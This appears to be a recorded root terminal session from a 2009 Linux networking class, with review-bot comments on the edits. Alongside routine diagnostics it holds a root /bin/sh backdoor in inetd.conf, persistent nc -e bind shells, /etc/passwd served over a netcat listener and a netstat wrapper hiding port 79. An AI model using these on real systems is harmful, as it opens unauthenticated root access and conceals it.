обновлено 0, установлено 0 новых пакетов, для удаления отмечено 0 пакетов, и 25 пакетов не обновлено.
10:35:17
#ethtool
ethtool: bad command line argument(s)
For more information run ethtool -h
10:35:21
#ethtool -h
ethtool version 6git
Usage:
ethtool DEVNAME Display standard information about device
        ethtool -s|--change DEVNAME     Change generic options
                [ speed %%d ]
                [ duplex half|full ]
                [ port tp|aui|bnc|mii|fibre ]
                [ autoneg on|off ]
                [ advertise %%x ]
                [ phyad %%d ]
...
        ethtool -p|--identify DEVNAME   Show visible port identification (e.g. blinking)
               [ TIME-IN-SECONDS ]
        ethtool -t|--test DEVNAME       Execute adapter self test
               [ online | offline ]
        ethtool -S|--statistics DEVNAME Show adapter statistics
        ethtool -n|--show-nfc DEVNAME   Show Rx network flow classificationoptions
                [ rx-flow-hash tcp4|udp4|ah4|sctp4|tcp6|udp6|ah6|sctp6 ]
        ethtool -N|--config-nfc DEVNAME Configure Rx network flow classification options
                [ rx-flow-hash tcp4|udp4|ah4|sctp4|tcp6|udp6|ah6|sctp6 p|m|v|t|s|d|f|n|r... ]
        ethtool -h|--help DEVNAME       Show this help
10:35:23
#ethtool -h | less
/dev/pts/0
10:36:02
#ssh 192.168.15.254
  25    100/1000T | No        Yes     Up     10HDx      MDIX  off   0
  26    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  27    100/1000T | No        Yes     Up     1000FDx    MDIX  off   0
  28    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  29    100/1000T | No        Yes     Up     1000FDx    MDI   off   0
  30    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
  31    100/1000T | No        Yes     Up     1000FDx    MDIX  off   0
  32    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  33    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
  34    100/1000T | No        Yes     Down   1000FDx    MDIX  off   0
  35    100/1000T | No        Yes     Down   1000FDx    MDI   off   0
/dev/pts/22
10:40:42
#10:40:43.049578 IP 10.0.66.1.netbios-dgm > 10.255.255.255.netbios-dgm: NBT UDP PACKET(138)
10:40:43.341825 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:40:43.366089 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:40:43.417650 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:40:43.576245 IP 10.0.1.2.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
10:40:43
#10:40:43.752613 ARP, Request who-has 10.0.1.5 (Broadcast) tell 10.0.1.5, length 46
10:40:43.757802 ARP, Request who-has 10.0.13.2 (Broadcast) tell 10.0.13.2, length 46
10:40:44
#10:40:44.167705 IP 10.0.1.3.netbios-ns > 10.255.255.255.netbios-ns: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST

10:40:44
#10:40:44.365718 ARP, Request who-has 10.0.10.223 tell 10.0.10.222, length 46
10:40:44.518508 ARP, Request who-has 10.0.20.201 tell 10.0.1.7, length 46
10:40:44
#10:40:44.657736 IP 10.0.20.1.59331 > 255.255.255.255.1211: UDP, length 75
10:40:53.317209 IP 192.168.105.2.39155 > 10.0.35.100.ssh: Flags [.], ack 450048, win 1002, options [nop,nop,TS val 576687 ecr 17513034], length 0
10:40:53.317212 IP linux9.unix.nt.58891 > 10.0.35.100.ssh: Flags [.], ack 450176, win 1002, options [nop,nop,TS val 755460 ecr 17513034], length 0
10:40:53.317218 IP 10.0.35.100.ssh > linux15.unix.nt.58191: Flags [P.], seq 450016:450144, ack 145, win 857, options [nop,nop,TS val 17513034 ecr 1004954], length 128
10:40:53.317223 IP linux11.unix.nt.51451 > 10.0.35.100.ssh: Flags [.], ack 450144, win 1002, options [nop,nop,TS val 18036775 ecr 17513034], length 0
10:40:53.317248 IP 10.0.35.100.ssh > 192.168.108.2.60432: Flags [P.], seq 498848:498976, ack 3201, win 857, options [nop,nop,TS val 17513034 ecr 1003539], length 128
10:40:53.317277 IP 10.0.35.100.ssh > 192.168.15.253.43536: Flags [P.], seq 456540:456668, ack 30209, win 956, options [nop,nop,TS val 17513034 ecr 23408378], length 128
10:40:53.317300 IP 10.0.35.100.ssh > 192.168.104.8.39490: Flags [P.], seq 382097:382225, ack 2704, win 857, options [nop,nop,TS val 17513034 ecr 836508], length 128
10:40:53.317320 IP linux3.unix.nt.33397 > 10.0.35.100.ssh: Flags [.], ack 448416, win 1002, options [nop,nop,TS val 472172 ecr 17513034], length 0
10:40:53.317334 IP 10.0.35.100.ssh > linux13.unix.nt.54565: Flags [P.], seq 319916:320060, ack 3284, win 956, options [nop,nop,TS val 17513034 ecr 35947], length 144
10:40:53.317398 IP 192.168.102.2.50364 > 10.0.35.100.ssh: Flags [.], ack 455440, win 1002, options [nop,nop,TS val 309491 ecr 17513034], length 0
...
10:40:54.965640 IP 10.0.35.100.49903 > 192.168.15.254.ssh: Flags [.], ack 1133529, win 11819, options [nop,nop,TS val 17513445 ecr 125915], length 0
10:40:54.965981 IP 10.0.35.100.ssh > linux6.unix.nt.48936: Flags [P.], seq 482384:482432, ack 2625, win 857, options [nop,nop,TS val 17513445 ecr 22454462], length 48
10:40:54.966049 IP 10.0.35.100.ssh > linux9.unix.nt.58891: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513445 ecr 755837], length 48
10:40:54.966089 IP 10.0.35.100.ssh > 192.168.106.2.56161: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 723002], length 48
10:40:54.966116 IP 10.0.35.100.ssh > linux11.unix.nt.51451: Flags [P.], seq 450416:450464, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 18037153], length 48
10:40:54.966132 IP linux6.unix.nt.48936 > 10.0.35.100.ssh: Flags [.], ack 482432, win 1002, options [nop,nop,TS val 22454463 ecr 17513445], length 0
10:40:54.966154 IP 10.0.35.100.ssh > 192.168.102.2.50364: Flags [P.], seq 455712:455760, ack 401, win 857, options [nop,nop,TS val 17513447 ecr 309869], length 48
10:40:54.966183 IP 10.0.35.100.ssh > linux3.unix.nt.33397: Flags [P.], seq 448688:448736, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 472550], length 48
10:40:54.966195 IP linux9.unix.nt.58891 > 10.0.35.100.ssh: Flags [.], ack 450496, win 1002, options [nop,nop,TS val 755872 ecr 17513445], length 0
10:40:54.966222 IP 10.0.35.100.ssh > 192.168.105.2.39155: Flags [P.], seq 450448:450496, ack 145, win 857, options [nop,nop,TS val 17513447 ecr 577065], length 48
/dev/pts/24
10:41:23
#apt-cache search mii-diag
mii-diag - A little tool to manipulate network cards
10:41:29
#lspci

10:44:24
#ssh 192.168.15.1
root@192.168.15.1's password:
Linux linux1 2.6.29-2-686 #1 SMP Sun May 17 17:56:29 UTC 2009 i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun  2 10:16:48 2009 from 192.168.101.2
l3-agent is already running: pid=4334; pidfile=/root/.lilalo/l3-agent.pid
/dev/pts/22
10:44:55
#pgrep tcpdump

10:45:06
#ps -aux|grep tcpdump
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root     11513  0.0  0.2   4924   768 pts/23   R+   10:45   0:00 grep tcpdump
10:45:24
#screen -x
12 minutes elapsed
/dev/pts/32
10:57:44
#screen -x
/dev/pts/24
10:59:17
#cat /proc/sys/net/ipv4/conf/all/rp_filter
0
/dev/pts/34
11:08:15
#screen -x
/dev/pts/36
11:10:21
#screen -x
/dev/pts/24
11:16:20
#mtr
mtr     mtrace
11:16:20
#mtr ya.ru
                                                    My traceroute  [v0.75]
                                                                                                      Tue Jun  2 11:18:00 2009
linux1 (0.0.0.0)
Keys:  Help   Display mode   Restart statistics   Order of fields   quit              Packets               Pings      37
                                                                                    Loss%   Snt   Last   Avg  Best  Wrst StDev
 Host                                                                                0.0%   133    0.7   1.6   0.6  55.4   6.1
    10.0.35.1                                                                       33.1%   133    0.2   0.2   0.2   0.3   0.0
 2. 192.168.70.1                                                                    98.5%   133  576.1 297.9  19.7 576.1 393.4
 3. ip.194.150.93.65.veer.net.ua                                                    87.9%   133  691.3 239.4  98.2 691.3 144.4
    uplink-uaix.veer.net.ua                                                          0.0%   132   37.3 102.9   8.5 671.7 121.0
 4. 217.27.155.29.sitel.com.ua                                                       0.0%   132   10.6  90.6   8.4 580.3 113.8
 6. yandex-gw.ix.net.ua                                                              0.0%   132   38.4  92.7   9.8 498.4 111.9
 7. titanium-vlan904.yandex.net                                                      0.0%   132   34.8 127.3  29.9 671.2 125.2
 8. silicon-vlan901.yandex.net                                                       0.0%   132   57.6 123.2  30.1 713.4 122.4
 9. ortega-vlan4.yandex.net                                                          0.0%   132   62.0 117.0  30.7 690.0 122.9
10. ya.ru                                                                            0.0%   132   54.3 102.8  30.3 725.8 106.7
11. ???
11:19:29
#traceroute -n ya.ru
traceroute to ya.ru (213.180.204.8), 30 hops max, 60 byte packets
 1  192.168.15.254  1.268 ms  1.460 ms  1.858 ms
 2  10.0.35.1  0.415 ms  0.403 ms  0.394 ms
 3  * * *
 4  * * *
 5  194.150.92.14  56.879 ms  57.076 ms  57.067 ms
 6  217.27.155.29  56.854 ms  56.506 ms  56.698 ms
 7  195.35.65.88  12.624 ms  55.786 ms  55.648 ms
 8  213.180.208.94  55.057 ms  95.129 ms  51.258 ms
 9  77.88.56.125  51.249 ms  51.443 ms  51.034 ms
10  213.180.210.188  51.231 ms  51.223 ms  51.217 ms
11  213.180.204.8  51.208 ms  51.200 ms  31.250 ms
11:19:52
#traceroute -n mail.ru
traceroute to mail.ru (194.67.57.20), 30 hops max, 60 byte packets
 1  192.168.15.254  1.216 ms  1.609 ms  1.806 ms
 2  10.0.35.1  0.160 ms  0.356 ms  0.344 ms
 3  * * *
 4  * * *
 5  194.150.92.2  11.689 ms  17.334 ms  17.326 ms
 6  64.210.19.41  59.890 ms  59.784 ms  59.600 ms
 7  64.208.222.202  51.222 ms  58.659 ms  58.521 ms
 8  194.186.157.50  101.073 ms  99.478 ms  100.891 ms
 9  * * *
10  * * *
11  * * *
12  * * *
13  * * *
14  * * *
15  * * *
16  * * *
17  * *^C
11:20:11
#traceroute -I -n mail.ru
traceroute to mail.ru (194.67.57.26), 30 hops max, 60 byte packets
 1  192.168.15.254  1.021 ms  1.219 ms  1.422 ms
 2  10.0.35.1  0.396 ms  0.393 ms  0.392 ms
 3  * * *
 4  * * *
 5  194.150.92.2  58.336 ms  58.335 ms  58.333 ms
 6  64.210.19.41  58.533 ms  58.126 ms  58.118 ms
 7  64.208.222.202  104.179 ms *  103.352 ms
 8  * 195.239.13.109  168.547 ms  168.538 ms
 9  195.239.8.10  159.747 ms  159.556 ms  159.550 ms
10  194.67.57.26  159.544 ms  113.500 ms  113.696 ms
11:20:18
#traceroute -I -n alpha.eb.co.ua
traceroute to alpha.eb.co.ua (62.80.163.45), 30 hops max, 60 byte packets
 1  192.168.15.254  1.244 ms  1.645 ms  1.847 ms
 2  10.0.35.1  0.409 ms  0.406 ms  0.404 ms
 3  * * *
 4  * * *
 5  194.150.92.14  16.274 ms  16.273 ms  16.271 ms
 6  217.27.155.29  16.064 ms  15.859 ms  15.851 ms
 7  195.35.65.224  15.641 ms  14.930 ms  31.588 ms
 8  62.80.172.91  31.237 ms  14.283 ms  22.252 ms
 9  62.80.163.45  22.039 ms  22.034 ms  22.232 ms
11:21:24
#traceroute -I -n -q5 alpha.eb.co.ua
traceroute to alpha.eb.co.ua (62.80.163.45), 30 hops max, 60 byte packets
 1  192.168.15.254  1.369 ms  1.770 ms  1.971 ms  2.378 ms  2.581 ms
 2  10.0.35.1  0.271 ms  0.269 ms  0.267 ms  0.265 ms  0.263 ms
 3  * * * * *
 4  194.150.93.65  11.728 ms * * * *
 5  194.150.92.14  54.503 ms  53.411 ms  53.053 ms  53.058 ms  52.647 ms
 6  217.27.155.29  52.381 ms  59.124 ms  24.056 ms  24.048 ms  24.044 ms
 7  195.35.65.224  23.850 ms  23.844 ms  24.041 ms  14.233 ms  14.870 ms
 8  62.80.172.91  24.913 ms  24.907 ms  24.901 ms  25.099 ms  24.918 ms
 9  62.80.163.45  26.762 ms  25.379 ms  61.207 ms  61.200 ms  61.196 ms
11:22:08
#trace
traceproto           traceroute           traceroute6.db       traceroute-nanog     tracert
traceproto.db        traceroute6          traceroute.db        traceroute-nanog.db  tracert.db
11:22:08
#tracert
Usage:
  tracert [ -46dFITnreAUV ] [ -f first_ttl ] [ -g gate,... ] [ -i device ] [ -m max_ttl ] [ -N squeries ] [ -p port ] [ -t tos ] [ -l flow_label ] [ -w waittime ] [ -q nqueries ] [ -s src_addr ] [ -z sendwait ] host [ packetlen ]
Options:
  -4                          Use IPv4
  -6                          Use IPv6
  -d  --debug                 Enable socket level debugging
  -F  --dont-fragment         Do not fragment packets
  -f first_ttl  --first=first_ttl
                              Start from the first_ttl hop (instead from 1)
  -g gate,...  --gateway=gate,...
...
                              `-F -N 1'
  --back                      Guess the number of hops in the backward path and
                              print if it differs
  -V  --version               Print version info and exit
  --help                      Read this help and exit
Arguments:
+     host          The host to traceroute to
      packetlen     The full packet length (default is the length of an IP
                    header plus 40). Can be ignored or increased to a minimal
                    allowed value
11:23:42
#which tracert
/usr/bin/tracert
11:23:53
#ls -l `!!`
ls -l `which tracert`
lrwxrwxrwx 1 root root 25 Ноя 24  2008 /usr/bin/tracert -> /etc/alternatives/tracert
11:23:56
#update-alternatives
update-alternatives: требуется --display, --query, --list, --get-selections, --config,--set, --set-selections, --install, --remove, --all, --remove-all или --auto
Usage: update-alternatives [<option> ...] <command>
Commands:
  --install <link> <name> <path> <priority>
    [--slave <link> <name> <path>] ...
                           add a group of alternatives to the system.
  --remove <name> <path>   remove <path> from the <name> group alternative.
  --remove-all <name>      remove <name> group from the alternatives system.
  --auto <name>            switch the master link <name> to automatic mode.
  --display <name>         display information about the <name> group.
...
  automatic mode.
Options:
  --altdir <directory>     change the alternatives directory.
  --admindir <directory>   change the administrative directory.
  --skip-auto              skip prompt for alternatives correctly configured
                           in automatic mode (relevant for --config only)
  --verbose                verbose operation, more output.
  --quiet                  quiet operation, minimal output.
  --help                   show this help message.
  --version                show the version.
11:24:29
#update-alternatives --list x-terminal-emulator
/usr/bin/koi8rxterm
/usr/bin/lxterm
/usr/bin/uxterm
/usr/bin/xterm
11:29:26
#apt-get install mtr
Чтение списков пакетов... Готово
Построение дерева зависимостей
Чтение информации о состоянии... Готово
Будут установлены следующие дополнительные пакеты:
  hicolor-icon-theme libatk1.0-0 libatk1.0-data libcups2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libjasper1 libtiff4
  libxcomposite1 libxcursor1 libxdamage1 libxfixes3 libxi6 libxinerama1 libxrandr2
Предлагаемые пакеты:
  cups-common librsvg2-common gvfs libjasper-runtime
НОВЫЕ пакеты, которые будут установлены:
  hicolor-icon-theme libatk1.0-0 libatk1.0-data libcups2 libgtk2.0-0 libgtk2.0-bin libgtk2.0-common libjasper1 libtiff4
...
Настраивается пакет libxcomposite1 (1:0.4.0-3) ...
Настраивается пакет libxcursor1 (1:1.1.9-1) ...
Настраивается пакет libxdamage1 (1:1.1.1-4) ...
Настраивается пакет libxi6 (2:1.2.1-2) ...
Настраивается пакет libxinerama1 (2:1.0.3-2) ...
Настраивается пакет libxrandr2 (2:1.3.0-2) ...
Настраивается пакет libgtk2.0-0 (2.16.1-2) ...
Настраивается пакет libgtk2.0-bin (2.16.1-2) ...
Настраивается пакет mtr (0.75-2) ...
Обрабатываются триггеры для menu ...
11:30:06
#mtr eb.co.ua
No address associated with hostname: No such file or directory
/dev/pts/26
11:34:38
#screen -x
/dev/pts/40
11:39:47
#screen -x
/dev/pts/42
11:48:46
#screen -x
/dev/pts/24
11:56:43
#exit
exit
Connection to 192.168.15.1 closed.
18 minutes elapsed
12:15:42
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:15:45
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:15:58
#netstat -ln -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
12:16:25
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:16:32
#cat /etc/inetd.conf
# /etc/inetd.conf:  see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
...
#:STANDARD: These are standard services.
#:BSD: Shell, login, exec and talk are BSD protocols.
#:MAIL: Mail, news and uucp services.
#:INFO: Info services
#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
#:RPC: RPC based services
#:HAM-RADIO: amateur-radio services
#:OTHER: Other services
9999            stream  tcp     nowait  approx  /usr/sbin/approx
/dev/pts/10
12:16:36
#screen -x
/dev/pts/24
12:17:39
#cat /etc/inetd.conf | grep ^# | grep -xv ''
# /etc/inetd.conf:  see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
...
#time           stream  tcp     nowait  root    internal
#:STANDARD: These are standard services.
#:BSD: Shell, login, exec and talk are BSD protocols.
#:MAIL: Mail, news and uucp services.
#:INFO: Info services
#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
#:RPC: RPC based services
#:HAM-RADIO: amateur-radio services
#:OTHER: Other services
12:17:49
#cat /etc/inetd.conf | grep -v ^# | grep -xv ''
9999            stream  tcp     nowait  approx  /usr/sbin/approx
12:17:53
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.4332.14561	2009-06-02 12:19:32.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:19:52.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-
+finger		stream	tcp	nowait	root	/bin/sh -i
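Review bot: the added `finger` line gives every TCP connection to port 79 an interactive `/bin/sh -i` running as `root`, with no authentication, no tcpd wrapper and no address restriction in the entry, so it is a root shell for any host that can reach the port. The entry should not exist on a real system: drop the line, and if a demonstration service is needed, start a harmless program under an unprivileged account instead of `root`.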
12:19:52
#pkill -1 inetd

12:19:57
#nc 127.0.0.1 79
Use of uninitialized value $ENV{"HOME"} in concatenation (.) or string at /etc/lilalo/l3config.pm line 12.
Can't open pidfile /tmp/.lilalo/l3-agent.pid for wrting: No such file or directory at /usr/local/bin/l3-agent line 934.
id #
uid=0(root) gid=0(root) groups=0(root)
ls / #
bin
boot
dev
disk1.img
disk2.img
...
opt
proc
root
sbin
selinux
srv
sys
tmp
usr
var
12:21:50
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.14067.18938	2009-06-02 12:21:52.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:22:01.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/bin/cat
+finger		stream	tcp	nowait	root	/usr/bin/bc
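Review bot: the user field on the `+` line is still `root`, which `bc` does not need; a calculator exposed on a network port should run under an unprivileged account such as `nobody`. The `-` line also shows `/bin/cat` rather than the `/bin/sh -i` entry from the previous recorded edit, so at least one change to this line is missing from the journal and the file's history cannot be reconstructed from these diffs alone.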
12:22:01
#which bc
/usr/bin/bc
12:22:31
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.28530.11257	2009-06-02 12:22:34.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:23:28.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/usr/bin/bc
+finger		stream	tcp	nowait	root	/usr/sbin/bc
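Review bot: the new server path `/usr/sbin/bc` on the `+` line does not match what `which bc` printed just before this edit (`/usr/bin/bc`), so inetd has nothing to execute for this service unless a binary also exists at that path. Keep `/usr/bin/bc`, or confirm the path with `ls -l` before reloading inetd.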
12:23:28
#which tcpd
/usr/sbin/tcpd
12:23:30
#vi /etc/inetd.conf
--- /tmp/l3-saved-11376.9740.9760	2009-06-02 12:23:31.000000000 +0300
+++ /etc/inetd.conf	2009-06-02 12:23:40.000000000 +0300
@@ -36,4 +36,4 @@
 
 #:OTHER: Other services
 9999		stream	tcp	nowait	approx	/usr/sbin/approx
-finger		stream	tcp	nowait	root	/usr/sbin/bc
+finger		stream	tcp	nowait	root	/usr/sbin/tcpd /usr/sbin/bc
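Review bot: nothing on the `+` line or around it documents which hosts_access rule controls this service; tcpd takes the daemon name from the program argument (`bc`), not from the inetd service name `finger`, so the matching entries in /etc/hosts.allow and /etc/hosts.deny have to be written as `bc:`. A comment above the entry saying so would save the next reader a lookup.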
12:23:40
#vi /etc/hosts.allow
--- /tmp/l3-saved-11376.18263.27419	2009-06-02 12:23:46.000000000 +0300
+++ /etc/hosts.allow	2009-06-02 12:23:54.000000000 +0300
@@ -10,3 +10,5 @@
 # rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
 # for further information.
 #
+bc: 127.0.0.1
+
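Review bot: `bc: 127.0.0.1` restricts nothing on its own, because hosts_access grants access when no rule matches; it only has an effect together with a deny rule for `bc` in /etc/hosts.deny, so the two files should be changed and reviewed as a pair. The hunk also adds an empty line after the rule, which can be dropped.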
12:23:54
#vi /etc/hosts.deny
--- /tmp/l3-saved-11376.1184.29844	2009-06-02 12:23:57.000000000 +0300
+++ /etc/hosts.deny	2009-06-02 12:24:05.000000000 +0300
@@ -17,3 +17,4 @@
 # validate looked up hostnames still leave understandable logs. In past
 # versions of Debian this has been the default.
 # ALL: PARANOID
+bc: ALL
12:26:34
#nc 10.0.35.100 79

12:26:48
#nc 10.0.35.100 79
2+3
12:27:00
#netstat -lnp -A inet
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:79              0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
12:27:30
#which netstat
/bin/netstat
12:28:19
#netstat()
> {
> /bin/netstat "$@" | grep -v :79
> }
/dev/pts/26
12:31:34
#cat /etc/hosts
hosts        hosts.allow  hosts.deny
12:31:34
#cat /etc/hosts.deny
# /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
#                  See the manual pages hosts_access(5) and hosts_options(5).
#
# Example:    ALL: some.host.name, .some.domain
#             ALL EXCEPT in.fingerd: other.host.name, .other.domain
#
# If you're going to protect the portmapper use the name "portmap" for the
# daemon name. Remember that you can only use the keyword "ALL" and IP
# addresses (NOT host or domain names) for the portmapper, as well as for
# rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
# for further information.
#
# The PARANOID wildcard matches any host whose name does not match its
# address.
# You may wish to enable this to ensure any programs that don't
# validate looked up hostnames still leave understandable logs. In past
# versions of Debian this has been the default.
# ALL: PARANOID
bc: ALL
/dev/pts/24
12:32:44
#Already at newest change
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
GET /favicon.ico HTTP/1.1
Host: 10.0.35.100:3000
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042807 Iceweasel/3.0.9 (Debian-3.0.9-1)
Accept: image/png,image/*;q=0.8,*/*;q=0.5
...
Host: 10.0.35.100:3000
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.10) Gecko/2009042807 Iceweasel/3.0.9 (Debian-3.0.9-1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
^[[A
[1]+  Stopped                 cat /etc/passwd | nc -l -p 3000
12:34:24
#kill %1
[1]+  Exit 1                  cat /etc/passwd | nc -l -p 3000
12:34:28
#while true; do cat /etc/passwd | nc -l -p 3000 ; done

/dev/pts/32
12:34:39
#screen -x
/dev/pts/24
12:34:46
#cat /dev/zero | nc -l -p 3000

12:35:49
#nc -e /bin/bash -p -p 3000
invalid local port -p
12:36:05
#nc -e /bin/bash -l -p 3000

12:36:15
#nc -e /bin/bash -l -p 3000 &
[1] 13293
12:36:18
#nc 127.0.0.1 3000
(UNKNOWN) [127.0.0.1] 3000 (?) : Connection refused
12:36:24
#nc -e /bin/bash -l -p 3001 & nc 127.0.0.1 3001
[2] 13323
ls /
bin
boot
dev
disk1.img
disk2.img
disk3.img
disk4.img
etc
...
selinux
srv
sys
tmp
usr
var
nohup nc -e /bin/bash -l -p 3002 &
nohup: redirecting stderr to stdout
[1]   Done                    nc -e /bin/bash -l -p 3000
[2]+  Done                    nc -e /bin/bash -l -p 3001
12:38:51
#nc 127.0.0.1 3002
id
uid=0(root) gid=0(root) группы=0(root)
nohup nc -e /bin/bash -l -p 3002 &
^C
12:39:08
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp        0      0 0.0.0.0:3002            0.0.0.0:*               LISTEN      13398/nc
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:41:00
#netstat -lnp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1681/inetd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      5449/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      1669/exim4
tcp        0      0 0.0.0.0:3002            0.0.0.0:*               LISTEN      13398/nc
tcp6       0      0 :::22                   :::*                    LISTEN      5449/sshd
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     4399     1391/syslog-ng      /dev/log
12:41:28
#find /proc -name \*cookies\*
/proc/sys/net/ipv4/tcp_syncookies
12:47:27
#cat `!!`
cat `find /proc -name \*cookies\*`
0
12:47:33
#find /proc -name \*syn\*
/proc/sys/net/ipv6/conf/default/max_desync_factor
/proc/sys/net/ipv6/conf/all/max_desync_factor
/proc/sys/net/ipv6/conf/dummy0/max_desync_factor
/proc/sys/net/ipv6/conf/eth0/max_desync_factor
/proc/sys/net/ipv6/conf/lo/max_desync_factor
/proc/sys/net/ipv4/tcp_max_syn_backlog
/proc/sys/net/ipv4/tcp_syncookies
/proc/sys/net/ipv4/tcp_synack_retries
/proc/sys/net/ipv4/tcp_syn_retries
/proc/sys/fs/quota/syncs
12:48:01
#find /proc -name \*socket\*

12:48:12
#find /proc -name \*sock\*
/proc/9770/attr/sockcreate
/proc/9772/task/9772/attr/sockcreate
/proc/9772/attr/sockcreate
/proc/9773/task/9773/attr/sockcreate
/proc/9773/attr/sockcreate
/proc/9775/task/9775/attr/sockcreate
/proc/9775/attr/sockcreate
/proc/9777/task/9777/attr/sockcreate
/proc/9777/attr/sockcreate
/proc/9779/task/9779/attr/sockcreate
...
/proc/12604/task/12604/attr/sockcreate
/proc/12604/attr/sockcreate
